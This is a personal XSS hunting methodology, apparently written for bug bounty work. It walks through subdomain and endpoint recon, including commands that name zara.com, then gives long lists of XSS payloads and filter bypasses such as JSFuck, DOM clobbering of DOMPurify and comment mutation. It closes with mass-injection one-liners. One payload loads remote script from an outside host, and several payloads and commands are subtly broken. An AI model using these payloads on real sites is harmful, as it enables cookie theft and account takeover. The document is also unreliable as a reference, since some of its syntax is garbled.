🏴‍☠️My XSS Attack Methodology

Blind XSS ----> https://xss.report/dashboard

block with bypass Decimal NCR and add extra 00000 like: &#0000000040
utf-8 encoding
Situational, but also good to know about.
needs some extra chars ontop of JSFuck, but may be useful if space is limited along with a loose filtering.
Translate arbitrary JavaScript into executable JavaScript using only 6 characters. The only downside is that complex JavaScript payloads can get very long.

How to check for Cross-Site-Scripting

  • Find the web extension:

  • Find the extension in Burp Proxy History

  • Look for an extension in Katana URLs

  • Find the extension using Google Dorking:

  • site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?

  • Find Endpoint:

  • Find endpoints in Burp Proxy History

  • Fuzz endpoints with a wordlist for the same extension using ffuf

  • Find Endpoints using GoLinkFinder: GoLinkFinder -d https://*.com | grep .asp

  • Find Endpoints using Google Dorking:

  • site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?

  • Let’s say I want to search for paths under google.com/api/*; all you have to do is use this URL:

http://web.archive.org/cdx/search/cdx?url=google.com/api/*&output=text&fl=original&collapse=urlkey&from=
  • To extract paths from the current page (paste the code in the browser console):

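// Endpoint-path extractor for the browser console.
// Collects every quoted, path-like string ("/foo/bar?x=1") found in the
// page's own HTML and in the external scripts it loads, then prints the
// de-duplicated list.
//
// Changes from the one-line bookmarklet this replaces:
//  - results are written only after every script fetch has settled, instead
//    of after a fixed 3-second timer that silently dropped slow responses;
//  - the list is rendered through textContent rather than document.write(),
//    so a string taken from the inspected page is never parsed as HTML.
// Scripts served cross-origin without CORS headers still cannot be fetched;
// those failures are logged to the console, as before.
(async function extractPaths() {
  // A path starts with "/", is enclosed in ", ' or `, and uses only the
  // characters in the class below (lookbehind needs a modern engine).
  const pathRegex = /(?<=["'`])\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=["'`])/g;
  const results = new Set();

  // Add every regex match in `text` to `results`.
  const collect = (text) => {
    for (const match of text.matchAll(pathRegex)) results.add(match[0]);
  };

  // The document itself is available synchronously.
  collect(document.documentElement.outerHTML);

  // External scripts: fetch all of them in parallel and wait for every one.
  const sources = [...document.scripts]
    .map((script) => script.src)
    .filter((src) => src !== '');
  const fetches = sources.map(async (src) => {
    try {
      const response = await fetch(src);
      collect(await response.text());
    } catch (err) {
      console.log('An error occurred: ', err);
    }
  });
  await Promise.all(fetches);

  // Replace the page body with one path per line, as plain text.
  const output = document.createElement('pre');
  output.textContent = [...results].join('\n');
  document.body.replaceChildren(output);
})();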
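// Endpoint / parameter / JS-file inventory for the browser console.
// Scans the current page's HTML, its inline scripts and every external
// script it can fetch, then shows a full-page overlay listing:
//   - quoted path-like strings ("/api/x?y=1") that were found,
//   - each query-parameter name seen, with the source(s) it came from,
//   - every .js file referenced.
//
// Fixes relative to the one-line bookmarklet this replaces:
//  - parameter sources were misattributed: the fetch callbacks closed over a
//    single `var t`, so every external script was credited to the URL of the
//    last script in the loop;
//  - the overlay was assembled by string concatenation into innerHTML, so a
//    script URL from the inspected page containing a quote could inject
//    markup into the overlay; it is now built from elements and textContent;
//  - results appeared after a fixed 3-second timer; now after all fetches settle;
//  - the regexes mixed URL-encoded quotes (%27, %60) with literal ones, so
//    single- and backtick-quoted strings were matched inconsistently.
(async function inventoryEndpoints() {
  const pathRegex = /(?<=["'`])\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=["'`])/g;
  const jsRegex = /(?<=["'`])(?:\/|https?:\/\/)[a-zA-Z0-9_?&=\/\-\#\.]+\.js(?:\?[^"'`]*)?(?=["'`])/g;
  const INLINE = 'Inline script or HTML';

  const endpoints = new Set();
  const paramSources = new Map(); // parameter name -> [labels of where it was seen]
  const jsFiles = new Set();

  // Record every endpoint, parameter name and .js reference found in `text`.
  // `origin` labels where the text came from (a script URL or a fixed label).
  function processContent(text, origin = INLINE) {
    for (const [endpoint] of text.matchAll(pathRegex)) {
      endpoints.add(endpoint);
      const query = endpoint.split('?')[1];
      if (!query) continue;
      for (const pair of query.split('&')) {
        const [key] = pair.split('=');
        if (!key) continue;
        if (!paramSources.has(key)) paramSources.set(key, []);
        paramSources.get(key).push(origin);
      }
    }
    for (const [file] of text.matchAll(jsRegex)) jsFiles.add(file);
  }

  // Inline scripts and the document are processed synchronously; external
  // scripts are fetched in parallel, each callback bound to its own `src`.
  const fetches = [];
  for (const script of document.scripts) {
    const src = script.src;
    if (src) {
      jsFiles.add(src);
      fetches.push(
        fetch(src)
          .then((response) => response.text())
          .then((text) => processContent(text, src))
          .catch((err) => console.log('An error occurred: ', err)),
      );
    } else {
      processContent(script.textContent);
    }
  }
  processContent(document.documentElement.outerHTML, 'Page content');
  await Promise.all(fetches);

  // ---- rendering: all page-derived strings go through textContent ----
  const absolute = (url) => (url.startsWith('http') ? url : window.location.origin + url);

  // Small element factory so no markup is ever built from strings.
  const el = (tag, { text, css, href } = {}) => {
    const node = document.createElement(tag);
    if (text !== undefined) node.textContent = text;
    if (css) node.style.cssText = css;
    if (href) {
      node.href = href;
      node.target = '_blank';
    }
    return node;
  };
  const CELL = 'background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;';
  const LINK = 'color:#4a69bd;text-decoration:none;word-break:break-all;';
  const heading = (text) => el('h2', { text, css: 'color:#4a69bd;margin-top:20px;' });
  const grid = (columns) => el('div', { css: `display:grid;grid-template-columns:${columns};gap:10px;` });

  const overlay = el('div', {
    css: 'position:fixed;top:0;left:0;width:100%;height:100%;background:#f0f8ff;color:#333;overflow:auto;z-index:9999;padding:20px;font-family:Arial,sans-serif;',
  });

  overlay.append(heading(`Endpoints Found: ${endpoints.size}`));
  const endpointGrid = grid('1fr 1fr');
  for (const endpoint of endpoints) {
    const full = absolute(endpoint);
    endpointGrid.append(el('div', { text: endpoint, css: CELL }));
    const cell = el('div', { css: CELL });
    cell.append(el('a', { text: full, href: full, css: LINK }));
    endpointGrid.append(cell);
  }
  overlay.append(endpointGrid);

  overlay.append(heading('Parameters Found:'));
  const paramGrid = grid('1fr 1fr');
  for (const [param, sources] of paramSources) {
    paramGrid.append(el('div', { text: param, css: CELL }));
    const cell = el('div', { css: CELL });
    sources.forEach((source, index) => {
      if (index > 0) cell.append(el('br'));
      cell.append(document.createTextNode(source));
    });
    paramGrid.append(cell);
  }
  overlay.append(paramGrid);

  overlay.append(heading(`JS Files Found: ${jsFiles.size}`));
  const jsGrid = grid('1fr');
  for (const file of jsFiles) {
    const cell = el('div', { css: CELL });
    cell.append(el('a', { text: file, href: absolute(file), css: LINK }));
    jsGrid.append(cell);
  }
  overlay.append(jsGrid);

  const closeBtn = el('button', {
    text: 'Close',
    css: 'position:fixed;top:10px;right:10px;background:#4a69bd;color:white;border:none;padding:10px 20px;cursor:pointer;',
  });
  closeBtn.onclick = () => overlay.remove();
  overlay.append(closeBtn);
  document.body.append(overlay);
})();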
  • Find Parameter:

  • Fuzz parameters with Arjun, or use the Param Miner and GAP Burp extensions, or Google Dorks

  • Fuzz parameters with a parameter wordlist using ffuf

  • Find a Parameter with x8 ./x8 -u http://website.com/Path.php -w wordlist.txt

  • Find parameters manually in the page source (view-source:) and the DOM (Inspect element), looking for things such as <input id='param1' name='param1'>

  • Find parameters manually in .js files (look for var = , ="" , ='')

  • Find them manually by going through the website to discover all possible endpoints with parameters

  • بڑی کمپنیاں بہت سارے اختتامی مقامات پر پیرامیٹر کے ناموں کو دوبارہ استعمال کرتی ہیں۔

  • How to Test XSS:

  • First, type a simple input such as asad and check whether it is reflected on the page or in the source code

  • Use the "Reflection" Burp extension to check which parameters are reflected on the page or in the source code

  • Find multiple reflected parameters using the GXSS tool

  • If it is reflected, input ">asad and check whether it escapes the context in which it is reflected

  • Find the blacklisted/filtered symbols using the KXSS tool

  • Find the blacklisted/filtered symbols using the isXSS Burp extension

  • Find the blacklisted/filtered symbols manually: ">'<x

  • Observe what tags are blocked by WAF and which keywords are allowed:

  • (script, iframe, img, body, svg, etc.)

  • Second, check one by one which suspicious symbols are encoded and which are not

  • Try Character Encoding (URL encoding, Double URL encoding, UTF-8 Unicode encoding, Long UTF-8 Unicode encoding, Hex encoding, Base64 encoding, HTML entity encoding, jsFuck encoding, etc.)

  • Try XSS using HTML quote encapsulation

  • Try URL string evasion

  • Create the payload list according to the allowed keywords, using the unblocked symbols, script tags and JavaScript event handlers

  • Brute-force the application with the XSS payload list you just created

  • and try to break out of the enclosing HTML tag with an input like this:

  • --></style></style></noscript></style></noscript></script></style></noscript></script></xmp></style></noscript></script></xmp></template></style></noscript></script></xmp></template></noembed><svg/onload=alert(document.domain)>

----------------------------------------------------------------

My Strategy to find XSS

-----------------------------------------------------------------

                  XSS Testing K liye Hummy website ki All Live Subdomains Chiye.
				  
* knockpy -d zara.com --recon --bruteforce
--------------------------------------
* ffuf -u https://FUZZ.zara.com  -w /home/kali/Downloads/best-dns-wordlist.txt
--------------------------------------
* Google Dork: site:*.domain.com -www
--------------------------------------
* Google Search: https://crt.sh
--------------------------------------
1: sublist3r -d zara.com -o sublist3r.txt   
2: subfinder -d zara.com -o subfinder.txt   
3: amass intel -d zara.com -whois -o amass.txt      
4: assetfinder --subs-only zara.com > assetfinder.txt
5: findomain -t zara.com -u findomain.txt   
6: cat assetfinder.txt Subfinder.txt Sublist3r.txt amass.txt > subdomains.txt  
7: sort -u subdomains.txt > sort.txt  
8: cat sort.txt | httprobe | uniq > live.txt
9: cat live.txt | httpx -title -probe -status-code -content-length -tech-detect -fr
--------------------------------------
                  
//XSS Testing K liye Hummy website ki all specific endpoint.js bhi files Chiye

$ katana -u https://website.com -jc -d 2 | grep ".js$" | uniq | httpx -mc 200,302 | sort > js_files.txt

//find hidden hidden endpoint parameters in js_files.txt

$ xnLinkFinder -i target_js.txt -sf https://target.com  -o js_final.txt

$ httpx -l js_final.txt --mc 200

$ ffuf -u https://target.com/FUZZ -w js_final.txt -o endpoint.txt

$ Arjun -u https://target.com/Enpoint -w Parameter.txt

//Search manually for DOM sinks in the endpoint .js files (look for innerHTML, var = , getParameter(), parameter, pathname, document.write(, document.cookie, location.href, redirectUrl, window.hash, returnUrl).
--------------------------------------

//XSS Testing K liye Hummy website k all endpoints or parameters Chiye. 
				  
1: sub su pehly hum website ko explore karen gy her ek page ko visit kar k all endpoints or parameters ki ek ek Seprate List bana len gy.
or website ko explore karty time hum her ek endpoint ko check karen gy k wo source-code me reflect ho raha ha ya nahi Path Based injection k liye.
--------------------------------------

2: Phir hum Google Dork se all endpoints or parameters ko usi duno lists me add karlen gy.
site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?
--------------------------------------

3: Phir hum Fuzzing Endpoints with the Same Extension (Assetnote Wordlists) Using ffuf phir inko Endpoints wali List me Add kar len gy.
--------------------------------------

4: Phir Archive URL se all endpoints or parameters ko filter kar k usi duno lists me add karlen gy.
http://web.archive.org/cdx/search/cdx?url=google.com/api/*&output=text&fl=original&collapse=urlkey&from=
$ cat all.txt | grep "=" | uro | httpx -mc 200,301,302 > parameter.txt
$ cat parameter.txt | httpx -status-code -content-length -cdn -method -fr -mc 200
$ cat all.txt | grep ".php$" | uro | httpx -mc 200,301,302 > endpoint.txt
$ cat endpoint.txt | httpx -status-code -content-length -cdn -method -fr -mc 200
--------------------------------------

//if search automate:

$ cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt
$ cat xss_fuzz.txt | freq | tee -a possible_xss.txt
--------------------------------------

5: Phir parameters list ki one by one Reflection check karen gy, if Reflected then bypass according to reflected Location in Source-Code.
--------------------------------------

6: Phir hum one by one Endpoints ko Check Karen gy for Find Parameters with Arjun or with x8 or Param Miner.
--------------------------------------

7: Phir hum in endpoints se find hony waly parameters ki one by one Reflection check karen gy if Reflected then bypass according to reflected Location in Source-Code.
--------------------------------------

8: XSS probe: test to reflection:  '"><
--------------------------------------

9: if reflected then use:  <u/onmouseover=alert(1)>test123
--------------------------------------

10: if not working then use: <img src=x onerror=import('https://x55.is')>  or <a autofocus contenteditable onfocus=alert(1)>focus this!
--------------------------------------
  
Remember Notes: 

1: Always check the reflection in the DOM inspector and in the source code, and find hidden parameters by searching the source for name=, id=, <form, value="" or hidden inputs such as: <input type="hidden" name="t" value="1">
2: Check Reflection according to Location Classification:
◉ inside a tag:  <input type="hidden" name="t" value="asad">
◉ Between tags: <h1> Results for: asad </h1>
◉ inside a script section: 
<script>
	var tracking = { type: '1', query: 'asad'};
	/* post it to some address */
</script>
3: Observe what Unblock or Unfiltered Symbols: [ " ' < > / \ ( ) ` { } ]
4: Observe what tags are blocked by WAF and which keywords are allowed: (<script>, <a>, <iframe>, <img>, <body>, <svg>, etc.)
5: Create a payload according to the allowed keywords or Using Unblock Symbols and Script tags and javascript Event handler.
6: How to add the target to the advanced scope in Burp Suite:
.*\.google\.com
.*google.*
-----------------------------------------------------------------

Note: Double URL encoding can be tried, since the first decoding step is performed by the HTTP layer; the still-encoded value may then get past the XSS filter and is decoded a second time afterwards.

<imsofake onpointerrawupdate=alert(1)>touch
<Img Src=OnXSS OnError=confirm(document.cookie)>
<iframe src=javascript:alert(document.cookie)>
"><svg onload="alert(document.cookie)">
'"><script>alert(1)</script><h1>d</h1>
"><img src=x onerror=alert(document.cookie)>
<img src=x onerror=alert(document.domain)>
<a href='#' onclick='alert("document.cookie")'>Click me</a>
<Img+Src=javascript:alert(1)+OnError=location=src>
<video src=1 href=1 onerror="javascript:alert(document.cookie)"></video> 
<div onpointerover="alert(document.cookie)">MOVE HERE</div>
<input onfocus='alert("document.cookie")' autofocus>
<details/open/ontoggle="alert`document.cookie`">
<xmp><p title="</xmp><svg/onload=alert(document.cookie)>">
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document.cookie)>
<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='></object>
<script/&&input1=FOOBAR&input1=>alert('@Synack');</script>

----------------------------------------------------------------

Bypass <script> Tags

<img src="" onerror="alert()">
<body onload="alert()">

----------------------------------------------------------------

To Bypass common xss tags filters like <script>, <img>, <a>, <body>

<button onfocus="alert()" autofocus>
<details ontoggle="alert()" open>payload</details>
<svg><animate onbegin="alert()" attributeName=x dur=1s>
<svg><animate onend="alert()" attributeName=x dur=1s>
<svg><animate onrepeat="alert()" attributeName=x dur=1s repeatCount=2 />
<svg><set onbegin="alert()" attributename=x dur=1s>

----------------------------------------------------------------

Bypass using javascript inside a string

<script>
foo="text </script><script>alert(1)</script>";
</script>

----------------------------------------------------------------

Bypass email filter

"><svg/onload=confirm(1)>"@x.y
"><svg/onload=alert(1)>"@x.y

----------------------------------------------------------------

XSS Filter removes script characters Bypass

  1. Now, if we try to inject <script>alert(1)</script>, it won’t work

  2. then I try to inject <img src=x onerror=alert(1)>

  3. In this case, we’ve used a handy little feature called HTML Event Attributes.

----------------------------------------------------------------

XSS Filter removes alert characters Bypass

If the blacklisted word is “alert”, alternatives are:

prompt(1), confirm(1), console.log(1), document.write(1)

----------------------------------------------------------------

XSS Filter removes Strings are blocked Bypass

  1. Sometimes you will run into situations where you can not form a string, maybe because quotes are blocked, or some other reason.

  2. In this case, String.fromCharCode can be handy. It takes ASCII codes, and then turns them into a string, for example, this payload:

  3. Then try to inject alert(String.fromCharCode(88,83,83))

  4. Will create an alert box with the characters corresponding to 88, 83, and 83. Which just happens to be an XSS alert.

----------------------------------------------------------------

XSS Filter removes () characters Bypass alert`1`

  1. First Payload > HTML entity encode then > URL encode

----------------------------------------------------------------

XSS Filter removes <> characters Bypass

  1. we can use onfocus event handler and then autofocus the input to trigger your code.

"onfocus=alert(document.cookie) autofocus="

----------------------------------------------------------------

XSS Filter removes /[A-Za-z0-9]/ characters Bypass

  1. In case the parameter value has all alphanumeric characters replaced with an empty string. Solution:

  2. So we can use something like JSFuck, which converts your javascript code into valid non-alphanumeric esoteric javascript.

  3. First Payload > JSFuck encode then > URL encode

----------------------------------------------------------------

XSS Filter removes !-/#&;% characters and Sink in Comment "<!--<p> parameter value </p> -- >" Bypass

  1. The value of the GET parameter debug ends up inside a comment which is then inserted to the DOM via innerHTML.

  2. The problem is that there's a filter which removes the !-/#&;% characters. But <php> is mutated into <!--php-- >, because browsers prefer not to render PHP sources if they are sent accidentally.

  3. This mutation creates a new comment, which will be nested inside the already existing one.

  4. However there's no concept of nested comments in HTML, hence the new comment breaks the old comment and lets us execute Javascript.

  5. Payload:

<?php><svg onload=alert(1337)>
<!-- Also works because, <?> is short for <php> -->
<?><svg onload=alert(1337)>

----------------------------------------------------------------

XSS Filter removes `'"+-!\[] and alert characters Bypass

  1. To bypass this, we can simply use a regex literal to obtain the string, lowercase it, and feed it to Function.

Function(/ALERT(1337)/.source.toLowerCase())()

Or

eval(8680439..toString(30))(1337)

Or even better,

eval(location.hash.slice(1))

and then add #alert(1337) to the URL to make it work, like: eval(location.hash.slice(1))#alert(document.cookie)


----------------------------------------------------------------

XSS Filter DOMPurify.Sanitize Function Bypass

  1. So we can use DOM Clobbering. By injecting HTML elements into the DOM, we can create Javascript variables.

  2. So in our case, we need to create a variable named ok. To do so, we create an anchor tag, because if an anchor tag has its id set to ok, the browser automatically creates a JavaScript variable named ok.

  3. There's another reason why we chose the anchor tag and it's because, when toString() is called on an anchor tag, it returns the href property of that anchor tag object.

  4. This is useful because not only we can control the variable creation, but also its string value.

  5. So when toString() is called on it, the href property is returned, and that is what gets executed.

<a id=ok href=tel:alert(1337)>

Things to note:

  • href cannot be any arbitrary string, it has to follow protocol:host format, if the string doesn't follow the format, its value will be BaseURL/yourString.

  • tel:alert(1337) is also a valid Javascript, because it follows label:code syntax.

  • tel is used because it's whitelisted as one of the safe protocols to be allowed by DOMPurify.

----------------------------------------------------------------

Payload Encode to Bypass Firewall

----------------------------------------------------------------

Stored XSS in the address field in billing activity at in Shopping Cart

  1. Go to https://shop.com

  2. click on any products like t-shirt

  3. Add that to the cart and

  4. Click on Proceed, enter the XSS payload a"><svg/onload=prompt(1)> in every address field, 5. then click OK/Proceed and the XSS will pop up

Summary:

  • input an xss payload which produces a popup in the address fields.

  • Submit.

  • Each time that order address is viewed the XSS will fire.

----------------------------------------------------------------

TOP XSS Payloads

"><img src="x" onerror="alert(document.cookie)">
"><img src=x onerror=alert(document.cookie)>
"><svg onload=alert(document.cookie)>
"><iframe src=javascript:prompt(document,cookie)>
 "><iframe src=javascript:prompt(1)>
"><svg onload=alert(1)>
"><img src=x onerror=alert(1)>
"><img src="x" onerror="alert(1)">
"><img src/onerror=prompt(document.cookie)>
"><!--<img src="--><img src=x onerror=alert(37)//">
"><img src=a onerror=alert(1)>123@sdf.com
"><a href=javascript:alert(document.domain);>Click Hare</a>
"><img src="x" onerror="window.open('https://google.com/');">
javascript%3Aalert%2F**%2F(document.domain)
javascript:alert(document.domain)
"><img src="x" onerror="window.open('https://google.com/');">
"onmouseover=alert(document.domain)//
"onmouseover=alert(document.cookie)//
X-Forwarded-Host: bing.com"><img src/onerror=prompt(document.cookie)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg<0x0c>onload=alert(1)><svg>
<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>
'><details/open/ontoggle=confirm(document.location)>/
'onmouseover='alert(document.cookie)'

----------------------------------------------------------------

Bypass Filter for Stored DOM XSS

<><img src=1 onerror=alert(document.cookie)>

----------------------------------------------------------------

DOM XSS With JSON Request

"-alert(1)}//

----------------------------------------------------------------

DOM XSS in AngularJS

{{$on.constructor('alert(document.cookie)')()}}

----------------------------------------------------------------

In JavaScript, several events can be used to trigger Cross-Site Scripting (XSS) payloads

- onabort: This event is triggered when an image fails to load.
- onerror: This event is triggered when an error occurs or an image fails to load.
- onload: This event is triggered when an object has loaded.
- onchange: This event is triggered when the content of a form element, the selection, or the checked state has changed (for <input>, <select>, <textarea>).
- onsubmit: This event is triggered when a form is submitted.
- onreset: This event is triggered when a form is reset.
- onselect: This event is triggered after some text has been selected in an element.
- onblur: This event is triggered when an element loses focus.
- onfocus: This event is triggered when an element receives focus. Payload: "onfocus=alert(1337) autofocus="
- onkeydown: This event is triggered when a key is pressed.
- onkeypress: This event is triggered when a key is pressed and released.
- onkeyup: This event is triggered when a key is released.
- onclick: This event is triggered when an element is clicked.
- ondblclick: This event is triggered when an element is double-clicked.
- onmousedown: This event is triggered when a mouse button is pressed.
- onmousemove: This event is triggered when the mouse is moved.
- onmouseout: This event is triggered when the mouse is moved off an element.
- onmouseover: This event is triggered when the mouse is moved over an element.
- onmouseup: This event is triggered when a mouse button is released.

These events can be used to trigger XSS payloads in different contexts, depending on the specific event and the structure of the HTML document.

----------------------------------------------------------------

Cross-site Scripting (XSS) Cheat Sheet

Basic Payload: <SCRIPT>alert()</SCRIPT>

HTML tag: we can insert our script inside some HTML attributes, such as onerror or onload:
<img src=”/” onload=”alert();” />

HTML attributes: some attributes like src and href can run Javascript code:
<a href="javascript:alert();" />

Script src: allows a file to be loaded inline:
<script src="data:text/javascript,alert()"></script>

----------------------------------------------------------------

DOM-Based XSS Used the following JavaScript payloads:

<script>alert(document.domain</script>
"><img src=x onerror=alert(document.cookie)>
javascript:alert(document.domain)
#data:text/javascript,alert(document.domain)
?next=javascript:alert(document.domain)
'onmouseover='alert(document.cookie)'
input_value');alert(')

----------------------------------------------------------------

Tip 2: When a function redirects you but the input is not reflected in the page source, still try an XSS payload — you may get DOM XSS.

Tip 3: Always check ?returnurl=, ?next= and other redirection parameters before login.

----------------------------------------------------------------

Automated XSS Finding ParamSpider | GXSS | Dalfox

  1. python3 /home/kali/tools/recon/ParamSpider/paramspider.py --domain http://testphp.vulnweb.com -o /home/kali/file.txt

  2. cat /home/kali/file.txt | /root/go/bin/Gxss

  3. cat /home/kali/file.txt | /root/go/bin/Gxss -p asad

  4. cat /home/kali/file.txt | /root/go/bin/Gxss -p asad | /root/go/bin/dalfox pipe --mining-dict --skip-bav

----------------------------------------------------------------

Automated XSS Finding Waybackurls | Gf Pattern | Dalfox

  1. waybackurls http://testphp.vulnweb.com >> file.txt

  2. cat file.txt | gf xss

  3. cat file.txt | gf xss | sed 's/=.*/=/'

  4. cat file.txt | gf xss | sed 's/=.*/=/' | dalfox pipe

----------------------------------------------------------------

Automated XSS Finding ParamSpider | kxss | Dalfox

  1. python3 /home/kali/tools/recon/ParamSpider/paramspider.py --domain http://testphp.vulnweb.com -o /home/kali/file.txt

  2. cat /home/kali/file.txt | /root/go/bin/kxss

  3. /root/go/bin/dalfox url http://testphp.vulnweb.com/listproducts.php?artist=

----------------------------------------------------------------

(1) One-Liner XSS Finding


echo http://testphp.vulnweb.com | waybackurls | grep "=" | uro | qsreplace '"><img src=x onerror=confirm(origin)>' | freq

----------------------------------------------------------------

(2) One-Liner XSS Finding

waybackurls http://testphp.vulnweb.com | grep '=' | qsreplace '"><img src=x onerror=confirm(origin)>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<img src=x onerror=confirm(origin)>" && echo "$host \033[0;31m" Vulnerable;done

----------------------------------------------------------------

(3) One-Liner XSS Finding

waybackurls http://testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | /root/go/bin/airixss -payload "confirm(1)" | egrep -v 'Not'

----------------------------------------------------------------

(4) One-Liner XSS Finding


echo http://testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq

----------------------------------------------------------------

(5) One-Liner XSS Finding

echo http://testphp.vulnweb.com | waybackurls | kxss (search for parameter XSS)

----------------------------------------------------------------

(6) One-Liner XSS Finding

echo http://testphp.vulnweb.com  | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

----------------------------------------------------------------

(7) One-Liner XSS Finding

cat targets.txt | gf xss | grep 'source=' | qsreplace '"><script>confirm(1)</script>' | while read host do ; do curl -silent -path-as-is -insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host 33[0;31mVulnerablen";done

----------------------------------------------------------------

(8) One-Liner XSS Finding

cat file.txt | while read h do;do curl -sk --insecure "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && \echo "$h \033[0;31mVul\n" || echo "$h \033[0;32mNot\n";done

----------------------------------------------------------------

(9) One-Liner XSS Finding

cat file.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

----------------------------------------------------------------
